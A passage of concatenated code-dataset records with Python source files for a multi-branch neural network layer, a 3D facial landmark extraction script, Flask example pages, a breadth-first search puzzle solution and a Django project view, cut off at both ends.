branch in self.branches:\n\t\t\t\t\tbranch.prev_widen(indices, magnifier, noise=noise)\n\t\t\treturn False, None, None\n\t\telif loc['multi-branch'] == 'out_bottle':\n\t\t\tassert self.out_bottle is not None, 'Invalid'\n\t\t\tchange_out_dim, indices, magnifier = self.out_bottle.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\treturn change_out_dim, indices, magnifier\n\t\telif loc['multi-branch'] == 'branch':\n\t\t\tbranch_idx = loc['branch']\n\t\t\tbranch = self.branches[branch_idx]\n\t\t\told_branch_out_dim = branch.out_features_dim\n\t\t\tchange_out_dim, indices, magnifier = branch.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\tif change_out_dim:\n\t\t\t\tassert self.merge != 'add', 'Invalid'\n\t\t\t\tprev_branch_out_dim = 0\n\t\t\t\tfor _i in range(0, branch_idx):\n\t\t\t\t\tprev_branch_out_dim += self.branches[_i].out_features_dim\n\t\t\t\tpost_branch_out_dim = 0\n\t\t\t\tfor _i in range(branch_idx + 1, len(self.branches)):\n\t\t\t\t\tpost_branch_out_dim += self.branches[_i].out_features_dim\n\t\t\t\told_size = prev_branch_out_dim + old_branch_out_dim + post_branch_out_dim\n\t\t\t\tbase = np.arange(old_size)\n\t\t\t\tindices = np.concatenate([\n\t\t\t\t\tbase[:prev_branch_out_dim],\n\t\t\t\t\tindices + prev_branch_out_dim,\n\t\t\t\t\tbase[prev_branch_out_dim + old_branch_out_dim:]\n\t\t\t\t])\n\t\t\t\tmagnifier = np.concatenate([\n\t\t\t\t\t[1] * prev_branch_out_dim,\n\t\t\t\t\tmagnifier,\n\t\t\t\t\t[1] * post_branch_out_dim,\n\t\t\t\t])\n\t\t\t\tif self.out_bottle is None:\n\t\t\t\t\treturn True, indices, magnifier\n\t\t\t\telse:\n\t\t\t\t\tself.out_bottle.prev_widen(indices, magnifier, noise=noise)\n\t\t\t\t\treturn False, None, None\n\t\t\telse:\n\t\t\t\treturn False, None, None\n\t\telse:\n\t\t\traise ValueError('Do not support %s' % loc['multi-branch'])\n\t\n\tdef deepen(self, loc, new_layer_config, input_dim):\n\t\tif loc['multi-branch'] == 'in_bottle':\n\t\t\tassert self.in_bottle is not None, 'Invalid'\n\t\t\treturn self.in_bottle.deepen(loc['layer'], new_layer_config, input_dim)\n\t\telif loc['multi-branch'] == 'out_bottle':\n\t\t\tassert self.out_bottle is not None, 'Invalid'\n\t\t\tif self.merge == 'concat': input_dim = np.sum([branch.out_features_dim for branch in self.branches])\n\t\t\telse: input_dim = self.branches[0].out_features_dim\n\t\t\treturn self.out_bottle.deepen(loc['layer'], new_layer_config, input_dim)\n\t\telif loc['multi-branch'] == 'branch':\n\t\t\tif self.in_bottle is not None: input_dim = self.in_bottle.out_features_dim\n\t\t\treturn self.branches[loc['branch']].deepen(loc['layer'], new_layer_config, input_dim)\n\t\telse:\n\t\t\traise ValueError('Do not support %s' % loc['multi-branch'])\n\t\t\n\tdef remapped_branches(self, noise=None):\n\t\tif self.merge == 'add' or self.merge is None:\n\t\t\tsize = self.out_features_dim\n\t\t\tindices = np.random.choice(np.arange(size), size)\n\t\t\tnew_branches = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tnew_layers = [layer.copy() for layer in branch.layers[:-1]]\n\t\t\t\tlast_layer = branch.layers[-1].copy().remap(indices, noise=noise)\n\t\t\t\tnew_layers.append(last_layer)\n\t\t\t\tnew_branch = LayerCascade(branch.id, new_layers)\n\t\t\t\tnew_branches.append(new_branch)\n\t\telif self.merge == 'concat':\n\t\t\tnew_branches = []\n\t\t\toffset = 0\n\t\t\tindices = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tsize = branch.out_features_dim\n\t\t\t\tsub_indices = np.random.choice(np.arange(size), size)\n\t\t\t\tnew_layers = [layer.copy() for layer in branch.layers[:-1]]\n\t\t\t\tlast_layer = branch.layers[-1].copy().remap(sub_indices, noise=noise)\n\t\t\t\tnew_layers.append(last_layer)\n\t\t\t\tnew_branch = LayerCascade(branch.id, new_layers)\n\t\t\t\tnew_branches.append(new_branch)\n\t\t\t\tindices.append(sub_indices + offset)\n\t\t\t\toffset += size\n\t\t\tindices = np.concatenate(indices)\n\t\telse:\n\t\t\traise NotImplementedError\n\t\treturn new_branches, indices\n","sub_path":"code/models/layer_multi_branch.py","file_name":"layer_multi_branch.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622167054","text":"import face_alignment\nimport numpy as np\nimport argparse\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport os, sys\nimport dlib\nimport imutils\nimport cv2\n\n\n# Run the 3D face alignment on a test image, without CUDA.\nfa = face_alignment.FaceAlignment(face_alignment.LandmarksType._3D, device='cpu',flip_input=False)\n\nABS_PATh = os.path.dirname(os.path.abspath(__file__)) + \"/\"\n\n# Instantiate the parser\nparser = argparse.ArgumentParser(description='a crop utility')\n\next = (\".avi\", \".mp4\")\n\nparser.add_argument('-d', '--dir_to_process', type=str, nargs='?',\n help='dir_to_process')\nparser.add_argument('-o', '--out_to_csv_file',type=str, nargs='?',\n help='if provided output will be writtent to csv(semicolon separated) otherwise to stdout. ')\nparser.add_argument('-ik', '--is_keep_extracted_image', action='store_true', help='A boolean True False')\n\ndetector = dlib.get_frontal_face_detector()\n\n# input = io.imread('../test/__assets/img1.jpeg')\n# preds = fa.get_landmarks(input)[-1]\n\nFLAGS = parser.parse_args()\n\nif FLAGS.dir_to_process == \"\":\n paths = [] #specify static here\nelse:\n paths = [FLAGS.dir_to_process+\"/\" ]\n\ndef resize( path ):\n items = os.listdir( path )\n\n for filename in items:\n\n if (filename.endswith(ext)): #or .avi, .mpeg, whatever. \n\n #single image only for testing \"-vframes 50\"\n\n NewDir = \"../__data/__images/\"+filename\n os.mkdir(NewDir)\n\n os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=1 {1}\".format( os.path.join( path+filename, filename ), os.path.join(NewDir, filename+\"%d.jpeg\"))) \n\n items1 = os.listdir(NewDir+\"/\")\n items1 = sorted(items1,key=lambda x: toint(os.path.splitext(x)[0]))\n\n with os.system(os.path.join( FLAGS.out_to_csv_file+\"/__out\", open(filename+\"_dir.csv\", 'wb' ))) as file:\n # with open(os.path.join( FLAGS.out_to_csv_file+\"/__out_1\", filename+\"_dir.csv\"), 'wb' ) as file:\n\n for item in items1:\n\n if item == '.DS_Store':\n continue\n\n if (item.endswith('.jpeg')):\n \n # load the input image, resize it, and convert it to grayscale\n images = cv2.imread(NewDir+\"/\"+item)\n # images = cv2.imread( os.path.join( path, \"images\", item ) ) \n \n try:\n preds = fa.get_landmarks(images)[-1]\n except:\n # print(\"No faces were detected...!\")\n continue\n \n #TODO: Make this nice\n fig = plt.figure(figsize=plt.figaspect(.5))\n ax = fig.add_subplot(1, 2, 1)\n # ax.imshow(input)\n ax.plot(preds[0:17,0],preds[0:17,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[17:22,0],preds[17:22,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[22:27,0],preds[22:27,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[27:31,0],preds[27:31,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[31:36,0],preds[31:36,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[36:42,0],preds[36:42,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[42:48,0],preds[42:48,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[48:60,0],preds[48:60,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(preds[60:68,0],preds[60:68,1],marker='o',markersize=6,linestyle='-',color='w',lw=2) \n ax.axis('off')\n\n ax = fig.add_subplot(1, 2, 2, projection='3d')\n surf = ax.scatter(preds[:,0]*1.2,preds[:,1],preds[:,2],c=\"cyan\", alpha=1.0, edgecolor='b')\n ax.plot3D(preds[:17,0]*1.2,preds[:17,1], preds[:17,2], color='blue' )\n ax.plot3D(preds[17:22,0]*1.2,preds[17:22,1], preds[17:22,2],color='blue')\n ax.plot3D(preds[22:27,0]*1.2,preds[22:27,1],preds[22:27,2], color='blue')\n ax.plot3D(preds[27:31,0]*1.2,preds[27:31,1],preds[27:31,2], color='blue')\n ax.plot3D(preds[31:36,0]*1.2,preds[31:36,1],preds[31:36,2], color='blue')\n ax.plot3D(preds[36:42,0]*1.2,preds[36:42,1],preds[36:42,2], color='blue')\n ax.plot3D(preds[42:48,0]*1.2,preds[42:48,1],preds[42:48,1], color='blue')\n ax.plot3D(preds[48:,0]*1.2,preds[48:,1], preds[48:,2],color='blue' )\n\n ax.view_init(elev=90., azim=90.)\n ax.set_xlim(ax.get_xlim()[::-1])\n\n # Remove item into dir\n os.remove(root+\"/\"+item)\n\n line = \"\\\"\"+item+\"~\" + str(0)+ \"\\\";\"\n\n for i in range(0, len(preds)):\n\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y, z)-coordinates to a NumPy\n # array\n\n line = line + \";\\\"\"+str(preds[i][0])+\"~\"+str(preds[i][1])+\"~\"+str(preds[i][2])+\"\\\"\"\n file.write(line.encode())\n file.write('\\n'.encode()) \n else:\n\n for root, dirs, files in os.walk(path+filename, topdown=False):\n\n for name in files:\n \n if (name.endswith(ext)): #or .avi, .mpeg, whatever.\n\n NewDir = \"../__data/__images_1/\"+name\n if not os.path.exists(NewDir):\n os.mkdir(NewDir)\n os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=10 {1}\".format( os.path.join( path+filename, name ), os.path.join(NewDir, name+\"%d.jpeg\"))) \n else:\n continue\n\n #os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=1 {1}\".format( os.path.join( path+filename, name ), os.path.join(NewDir, name+\"%d.jpeg\"))) \n \n items1 = os.listdir(NewDir+\"/\")\n\n #hiren changed this on 19-06-2019\n #with open(os.path.join( FLAGS.out_to_csv_file+\"/__out\", name+\"_dir.csv\"), 'wb' ) as file:\n with open(os.path.join( FLAGS.out_to_csv_file+\"/\", name+\"_dir.csv\"), 'wb' ) as file:\n\n for item in items1:\n\n if item == '.DS_Store':\n continue\n\n if (item.endswith('.jpeg')):\n\n # load the input image, resize it, and convert it to grayscale\n images = cv2.imread(NewDir+\"/\"+item)\n\n # f, e, = os.path.splitext(root+\"/\"+item)\n\n try:\n # print( \"img \" + item )\n preds = fa.get_landmarks(images);\n # print( len(preds) );\n # print(preds)\n\n for ( i, Prd ) in enumerate( preds ):\n\n #TODO: Make this nice\n fig = plt.figure(figsize=plt.figaspect(.5))\n ax = fig.add_subplot(1, 2, 1)\n # ax.imshow(input)\n ax.plot(Prd[0:17,0],Prd[0:17,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[17:22,0],Prd[17:22,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[22:27,0],Prd[22:27,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[27:31,0],Prd[27:31,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[31:36,0],Prd[31:36,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[36:42,0],Prd[36:42,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[42:48,0],Prd[42:48,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[48:60,0],Prd[48:60,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[60:68,0],Prd[60:68,1],marker='o',markersize=6,linestyle='-',color='w',lw=2) \n ax.axis('off')\n\n ax = fig.add_subplot(1, 2, 2, projection='3d')\n surf = ax.scatter(Prd[:,0]*1.2,Prd[:,1],Prd[:,2],c=\"cyan\", alpha=1.0, edgecolor='b')\n ax.plot3D(Prd[:17,0]*1.2,Prd[:17,1], Prd[:17,2], color='blue' )\n ax.plot3D(Prd[17:22,0]*1.2,Prd[17:22,1],Prd[17:22,2],color='blue')\n ax.plot3D(Prd[22:27,0]*1.2,Prd[22:27,1],Prd[22:27,2], color='blue')\n ax.plot3D(Prd[27:31,0]*1.2,Prd[27:31,1],Prd[27:31,2], color='blue')\n ax.plot3D(Prd[31:36,0]*1.2,Prd[31:36,1],Prd[31:36,2], color='blue')\n ax.plot3D(Prd[36:42,0]*1.2,Prd[36:42,1],Prd[36:42,2], color='blue')\n ax.plot3D(Prd[42:48,0]*1.2,Prd[42:48,1],Prd[42:48,1], color='blue')\n ax.plot3D(Prd[48:,0]*1.2,Prd[48:,1], Prd[48:,2],color='blue' )\n\n ax.view_init(elev=90., azim=90.)\n ax.set_xlim(ax.get_xlim()[::-1])\n\n # Remove item into dir\n if not FLAGS.is_keep_extracted_image:\n os.remove(NewDir+\"/\"+item)\n\n # for (i,Pre) in enumerate(Prd):\n\n line = \"\\\"\"+item+\"~\" + str(i)+ \"\\\";\"\n\n for i in range(0, len(Prd)):\n\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y, z)-coordinates to a NumPy\n # array\n\n line = line + \";\\\"\"+str(Prd[i][0])+\"~\"+str(Prd[i][1])+\"~\"+str(Prd[i][2])+\"\\\"\"\n file.write(line.encode())\n file.write('\\n'.encode()) \n\n except:\n continue\n else:\n continue \n\n \nfor path in paths:\n resize( path )\n","sub_path":"face-alignment-master/examples/facial_3D_landmarks.py","file_name":"facial_3D_landmarks.py","file_ext":"py","file_size_in_byte":11700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"144194247","text":"from wtforms.validators import InputRequired, NumberRange\nfrom app import g\nimport msg\nfrom page import Page, PageForm, PageTable, \\\n DisplayPictureField, DisplayTextField, ButtonUrlField, \\\n BooleanField, DateField, DateTimeField, DecimalField, FileField, \\\n FloatField, IntegerField, RadioField, SelectField, \\\n SelectMultipleField, SubmitField, StringField, \\\n HiddenField, PasswordField, TextAreaField\nfrom flask import render_template, render_template_string, redirect\nimport datetime\nimport random\nfrom sendmail import sendmail\nimport fondum_utility\n\n\n# /example/about/\nclass About(Page):\n\n default_text = \"\"\"\n==About {{DOMAIN}}\n\"\"\"\n\n\ndef mylookup():\n return [(\"aa\", \"Dynamic A\"), (\"bb\", \"Dynamic B\")]\n\n\n# url will be /example/example-of-everything/\nclass ExampleOfEverything(Page):\n\n default_text = \"\"\"\n== Example of Everything\n\nThis very-crowded page is an example of all the items can be found on a \"Page\" class page.\n\nThey are (in order):\n\n# Page Document (this section)\n** Currently showing //default_text//, but can be overwritten with MongoDB document\n# A Form\n** a.k.a. //MainForm//\n** \"horizontal\" form_style was chosen.\n** a //process_form// function was found in the MainForm, so the \n# A Catalog\n** TBD\n# A Set of Tables\n** Two tables; the first one has randomized data in it.\n\n\n\"\"\"\n\n form_style = \"horizontal\"\n\n class MainForm(PageForm):\n\n b = BooleanField(\"My Boolean\")\n d = DateField(\"My Date\")\n dt = DateTimeField(\"My DateTime\")\n fl = FloatField(\"My Float\")\n i = IntegerField(\"My Integer\")\n r = RadioField(\"My Radio\", choices=[(\"x\", \"X\"), (\"y\", \"Y\")], default=\"y\")\n sf = SelectField(\"My Select\", choices=mylookup)\n sfm = SelectMultipleField(\"My Multiple Select\", choices=[(\"c\", \"C\"), (\"d\", \"D\")])\n s = StringField (\"My String\")\n h = HiddenField(\"My Hidden\")\n p = PasswordField(\"My Password\")\n t = TextAreaField(\"My Text Data\")\n buf = ButtonUrlField(\"My Button Url Field\", href=\"https://google.com\")\n dpf = DisplayPictureField(\n \"My Picture\",\n url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/The_Earth_seen_from_Apollo_17.jpg/225px-The_Earth_seen_from_Apollo_17.jpg\",\n href=\"https://www.yahoo.com\"\n )\n dtf = DisplayTextField(\"My Displayed Text\", default=\"abcdefg\")\n submit = SubmitField(\"Send It\")\n\n def set_field_values(self, new_page, **kwargs):\n self.dt.data = datetime.datetime.now()\n self.t.data = \"Some starting text!\\n...and some more!\"\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n msg.flash(\"Got it! string={}, integer={}, etc.\".format(wtf.s.data, wtf.i.data))\n return msg.success(\"All good.\", return_def=\"page_example_about\")\n\n\n\n\n class MyTableOne(PageTable):\n key_name = \"tab_one\"\n table_name = \"My Table with Random Values\"\n\n class MTRow(PageForm):\n b = BooleanField(\"My Boolean\")\n d = DateField(\"My Date\")\n dt = DateTimeField(\"My DateTime\")\n fl = FloatField(\"My Float\")\n i = IntegerField(\"My Integer\")\n r = RadioField(\"My Radio\", choices=[(\"x\", \"X\"), (\"y\", \"Y\")], default=\"y\")\n sf = SelectField(\"My Select\", choices=[(\"a\", \"A\"), (\"b\", \"B\")])\n sfm = SelectMultipleField(\"My Multiple Select\", choices=[(\"c\", \"C\"), (\"d\", \"D\"), (\"e\", \"E\"), (\"f\", \"F\")])\n s = StringField (\"My String\")\n h = HiddenField(\"My Hidden\")\n p = PasswordField(\"My Password\")\n t = TextAreaField(\"My Text Data\")\n buf = ButtonUrlField(\"My Button Url Field\", href=\"https://google.com\")\n dpf = DisplayPictureField(\n \"My Picture\",\n url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/The_Earth_seen_from_Apollo_17.jpg/225px-The_Earth_seen_from_Apollo_17.jpg\",\n href=\"https://www.yahoo.com\"\n )\n dtf = DisplayTextField(\"My Displayed Text\", default=\"abcdefg\")\n submit = SubmitField(\"Send It\")\n\n def process_table(self, **kwargs):\n self.set_header(self.MTRow())\n for n in range(1, 5):\n r = self.MTRow()\n r.b.data = random.choice([True, False])\n r.d.data = datetime.datetime.now()\n r.dt.data = datetime.datetime.now()\n r.fl.data = random.random()\n r.i.data = random.randint(-1000, 1000)\n r.r.data = random.choice(r.r.choices)[0]\n r.sf.data = random.choice(r.sf.choices)[0] # it does NOT display 'default'; it displays 'data'\n r.sfm.data = [random.choice(r.sfm.choices)[0], random.choice(r.sfm.choices)[0]]\n # r.sfm.data = [k for k,v in random.choices(r.sfm.choices, k=random.randint(0,len(r.sfm.choices)))]\n r.s.data = random.choice([\"hat\", \"apple\", \"ball\", \"fish\"])\n r.h.data = \"you can't see me.\"\n r.p.data = \"still can't see me.\"\n r.t.data = \"line1\\nline2\\nline3\\n\"\n # r.buf.data = x # it does not matter what 'data' contains\n # r.dpf.data = x\n self.rows.append(r)\n return msg.success(\"random number of rows of things.\")\n\n class MyTableTwo(PageTable):\n key_name = \"tab_two\"\n table_name = \"My Table Two\"\n\n class TabTwoRow(PageForm):\n s_name = StringField(\"Name\")\n s_something = StringField(\"Something\")\n s_none = StringField(\"Nothing\")\n\n def process_table(self, **kwargs):\n self.set_header(self.TabTwoRow())\n for a in [\"a\", \"b\", \"c\"]:\n r = self.TabTwoRow()\n r.s_name.data = a\n r.s_something.data = \"blah\"\n self.rows.append(r)\n return msg.success(\"rows of stuff for table 2.\")\n\n\n table_order = [\n MyTableOne,\n MyTableTwo\n ]\n\n\n\n\n\n\n# /example/special/\nclass Special(Page):\n\n # a \"fondum_bypass\" method, if defined, causes fondum to basically ignore\n # _almost_ everything about Page and use fondum_pypass to render the web page instead.\n #\n # Do NOT use decorators. The route decorator is already handled by fondum compilation.\n # For the decorator requiring login, add/modify the \"login_required\" attribute.\n\n login_required = False\n\n def fondum_bypass(self, **kwargs):\n special_text = \"\"\"\n \n \n

Aha, {{g.display_name}}!

\n We are running a hardcore \"view\" of our own!\n

\n Fancier:\n

\n \n \n \n \"\"\"\n return render_template_string(special_text, short_list=[\"one\", \"two\"])\n\n\n# /example/special-with-parm/\nclass SpecialWithParm__myparm(Page):\n\n # an example \"fondum bypass\" that has a route paramater (/example/special-with-parm/)\n # this example also uses an html jinja file in the templates directory\n\n login_required = False\n\n def fondum_bypass(self, **kwargs):\n return render_template(\"special-with-parm.html\", kwargs=kwargs)\n\n\n# /example/example-sendmail/\nclass ExampleSendmail(Page):\n\n default_text = \"\"\"\n==== Examples of Extended Features\n== Sendmail\n\nThe example below shows the //sendmail// feature of fondum. By default, this \nextended feature is turned off.\n\nThe example is kind of silly. Generally, one would never allow the general public\nto send emails. It is strictly for demonstraction. In practice, you would use the function\nmore subtley and with greater restrictions.\n\n** Currently uses //sendgrid// commercial service; which includes a free tier.\n\"\"\"\n\n class MainForm(PageForm):\n\n msg_to = DisplayTextField(\"To:\")\n msg_from = StringField(\"From:\")\n msg_subject = StringField(\"Subject:\")\n msg_text = TextAreaField(\"Body (with creole markup):\")\n submit = SubmitField(\"Send An Email\")\n\n def set_field_values(self, new_page, **kwargs):\n self.msg_to.data = \"test@example.com\"\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n result_msg = sendmail(\n 1,\n to_addr=\"test \",\n creole_text=self.msg_text.data, \n subject=self.msg_subject.data, \n from_addr=self.msg_from.data,\n )\n return result_msg\n\n\n# /example/flash\nclass Flash(Page):\n\n default_text = \"\"\"\n== Example of Flash Messaging\n\nUsing the form below, enter a message and category of message and press Submit.\nA copy of that message will then flash on the page after submission.\n\"\"\"\n\n class MainForm(PageForm):\n\n message = StringField(\"Message content\")\n category = SelectField(\"Category\", choices=[\n (\"message\", \"Default/Generic [message]\"),\n (\"success\", \"Success [success]\"),\n (\"info\", \"Informational [info]\"),\n (\"warning\", \"Warning/Caution [warning]\"),\n (\"danger\", \"Danger/Error/Failure [danger]\"),\n ])\n submit = SubmitField(\"Submit\")\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n\n m = msg.message(self.message.data)\n m.set_category(self.category.data)\n return m\n\n\n# NOTE: Normally the following would be stored in the corresponding\n# 'x__models.py' file. So, in this case, it would be stored in\n# 'examples__models.py'. But I break the normal rule here to help with\n# documentation of this CopyFields example.\n#\n\nimport mongoengine as db\n\n\nclass TestDocument(db.Document):\n name = db.StringField(label=\"Full Name\", required=True)\n height = db.IntField(required=True)\n age = db.IntField()\n hair_color = db.StringField(\n choices=('black', 'brown', 'blond', 'red', 'grey'),\n )\n handedness = db.StringField(\n label = \"Left/Right Handed\",\n choices=('left', 'right'),\n radio=True\n )\n shirt_color = db.StringField(\n label=\"Shirt Color Assigned\",\n default=\"blue\",\n display_only=True,\n )\n notes = db.StringField(\n textarea=True\n )\n silly = db.StringField(\n label=\"Can't See Me\",\n default=\"blimey\",\n required=True,\n hide=True\n )\n income = db.FloatField(required=True)\n\n#\n# \"extra\" labels supported:\n# label = Field Label\n\n# NOTE: Normally the following would be stored in the corresponding\n# 'x__database.py' file. So, in this case, it would be stored in\n# 'examples__database.py'. But I break the normal rule here to help with\n# documentation of this CopyFields example.\n#\n\nfrom fondum_utility import copy_fields\n\n\ndef create_testDocument(wtf):\n doc = TestDocument()\n copy_fields(src=wtf, dest=doc)\n doc.save()\n return msg.success('Created TestDocument \"{}\"'.format(doc.name))\n\n\ndef read_testDocument(doc_id):\n doc = TestDocument.objects(id=doc_id).first()\n if doc:\n return doc\n return msg.err(\"Unable to locate document\")\n\n\ndef readlist_testDocument_all():\n tdl = TestDocument.objects()\n return tdl\n\n\ndef delete_testDocument(doc_id):\n doc = read_testDocument(doc_id)\n if msg.is_message(doc):\n return doc\n doc.delete()\n return msg.success(\"TestDocument document deleted.\")\n\n\n# /example/copy-fields\nclass CopyFields(Page):\n\n default_text = \"\"\"\n== Example of the Copy Fields Function\n===List Documents\n\n\"Fields\" are importable in both directions.\n* One can import the fields of a MongoEngine Document into a PageForm (child of WTForms) with the '_import_fields=obj' class variable.\n* One can export the fields of PageForms into a MongoEngine Document with the 'fondum_utility.copy_fields(...)' function.\n\nSee the corresponding source code for this page for the example of use.\n\nNOTE: By definition, '_import_fields' skips the 'id' fields or any field starting with an underscore.\n\nNOTE: the library 'Flask-MongoEngine' also has a 'model_form' function that has function similar to '_import_fields'.\n\nThis particular page reads the contents of the 'TestDocument' collection and shows the entries.\n\"\"\"\n\n class TableOne(PageTable):\n key_name = \"main\"\n table_name = \"\" # an empty table name (and only one table) suppresses the tabs\n\n class Row(PageForm):\n _import_fields = TestDocument\n # _field_order is strictly optional; without it, the imports are simply appended\n delete = ButtonUrlField(\"Delete\")\n _field_order = ['name', 'age', 'height', 'hair_color', 'shirt_color', 'notes', \"handedness\", \"silly\", 'income', \"delete\"]\n\n class CreateButtonRow(PageForm):\n create = ButtonUrlField(\"Create\", href=\"/example/copy-fields-new/\")\n\n def process_table(self, **kwargs):\n self.set_header(self.Row())\n tdl = readlist_testDocument_all()\n for doc in tdl:\n r = self.Row()\n fondum_utility.copy_fields(src=doc, dest=r)\n r.delete.href = \"/example/copy-fields-delete/{}/\".format(doc.id)\n self.rows.append(r)\n self.rows.append(self.CreateButtonRow())\n return msg.success(\"all documents\")\n\n table_order = [\n TableOne,\n ]\n\n# /example/copy-fields-new\nclass CopyFieldsNew(Page):\n\n default_text = \"\"\"\n== Example of the Copy Fields Function\n=== Create New Record\n\nThis particular page creates a new document in the TestDocument collection.\n\"\"\"\n\n class MainForm(PageForm):\n\n age = IntegerField(\"Current Age\")\n submit = SubmitField(\"Submit\")\n # _import_fields = models.TestDocument\n _import_fields = TestDocument\n\n # _field_order is strictly optional; without it, the imports are simply appended\n _field_order = ['name', 'age', 'height', 'hair_color', 'shirt_color', 'income', 'notes', 'silly', 'handedness', 'submit']\n\n def process_form(self, wtf, **kwargs):\n # return database.create_testDocument()\n response = create_testDocument(wtf)\n if msg.is_good(response):\n response.return_def = \"page_example_copy_fields\"\n return response\n\n def set_field_values(self, new_page, **kwargs):\n if new_page:\n self.age.data = 22\n\n\n# /example/copy-fields-delete/\nclass CopyFieldsDelete__id(Page):\n\n def fondum_bypass(self, **kwargs):\n doc_id = kwargs[\"id\"]\n response = delete_testDocument(doc_id)\n msg.flash(response)\n return redirect(\"/example/copy-fields/\")\n\n# eof\n","sub_path":"fondum/starter_web/custom/example__pages.py","file_name":"example__pages.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"203489539","text":"\ndef work(n, k):\n map = [0] * 200000\n step = 0\n s = set()\n s.add(n)\n map[n] = 1\n while map[k] == 0:\n step += 1\n now = set()\n for x in s:\n if x+1 <= 100000 and map[x + 1] == 0:\n now.add(x + 1)\n map[x + 1] = 1\n if x-1 >= 0 and map[x - 1] == 0:\n now.add(x - 1)\n map[x - 1] = 1\n if x*2 <= 100000 and map[x * 2] == 0:\n now.add(x * 2)\n map[x * 2] = 1\n s = now\n return step\n\n\n# -- author: lijw --\nif __name__ == '__main__':\n n, k = input().split(' ')\n n = int(n)\n k = int(k)\n print(work(n, k))\n","sub_path":"225. Catch That Cow/225.py","file_name":"225.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"504724055","text":"import json\nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom .models import Projects,Work,WorkType,Customers,Employee\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nimport datetime\n\ndef dictfetchall(cursor):\n \"Return all rows from a cursor as a dict\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\ndef Sproject():\n cursor = connection.cursor()\n cursor.execute('select p.id, p.name as pname, p.address, p.start, p.end, p.pcode, p.contract_value, '\n +' pt.name as ptname, pt.id as ptid, c.id as cid, c.fname'\n +' from projects_projects p, projects_projecttype pt, projects_customers c'\n +' where pt.id = p.projtype_id'\n +' and p.customer_id = c.id order by p.id ')\n row = dictfetchall(cursor)\n return row\n \ndef genProjectCode():\n now = datetime.datetime.now()\n try:\n i= Projects.objects.all().order_by(\"-id\")[0]\n print(i.id)\n i = i.id+1\n code = (\"P-\"+ now.strftime(\"%d%m%y\") + \"\" + str('{:05d}'.format(i)))\n print(code)\n except:\n code = (\"P-\"+ now.strftime(\"%d%m%y\") + \"\" + \"00001\")\n print(code)\n return code\n\ndef Scustomer():\n cursor = connection.cursor()\n cursor.execute('select * from projects_customers ')\n row = dictfetchall(cursor)\n return row\n\ndef SprojectType():\n cursor = connection.cursor()\n cursor.execute('select * from projects_projecttype order by active desc,id')\n row = dictfetchall(cursor)\n return row\n\n@csrf_exempt\ndef findProject(request):\n data = Sproject()\n dataProjType = SprojectType()\n code = genProjectCode()\n dataCust = Scustomer()\n context = {'data':data,'dataCust':dataCust,'dataProjType':dataProjType,'code':code}\n return JsonResponse(context)\n\ndef ProjectList(request):\n return render(request, 'projects/index.html')\n \ndef AddProject(request):\n if request.method == 'POST':\n project_code = request.POST.get('code')\n project_name = request.POST.get('pname')\n project_type = request.POST.get('projType')\n project_contract_val = request.POST.get('contractval')\n project_address = request.POST.get('address')\n project_cust = request.POST.get('cust')\n project_start = request.POST.get('start')\n project_end = request.POST.get('end')\n users = request.user.id\n hAction = request.POST.get('hAction')\n response_data = {}\n\n if hAction == 'new':\n projects = Projects(\n pcode = project_code,\n name = project_name,\n projtype_id=project_type,\n Contract_value = project_contract_val,\n address = project_address,\n customer_id = project_cust,\n start = project_start,\n end=project_end,\n user_id = users\n )\n projects.save()\n\n response_data['result'] = 'Create work successful!'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n \n elif hAction == 'update':\n project_id = Projects.objects.get(pcode=project_code)\n print(project_id.pk)\n projects = Projects(\n pk= project_id.pk,\n pcode = 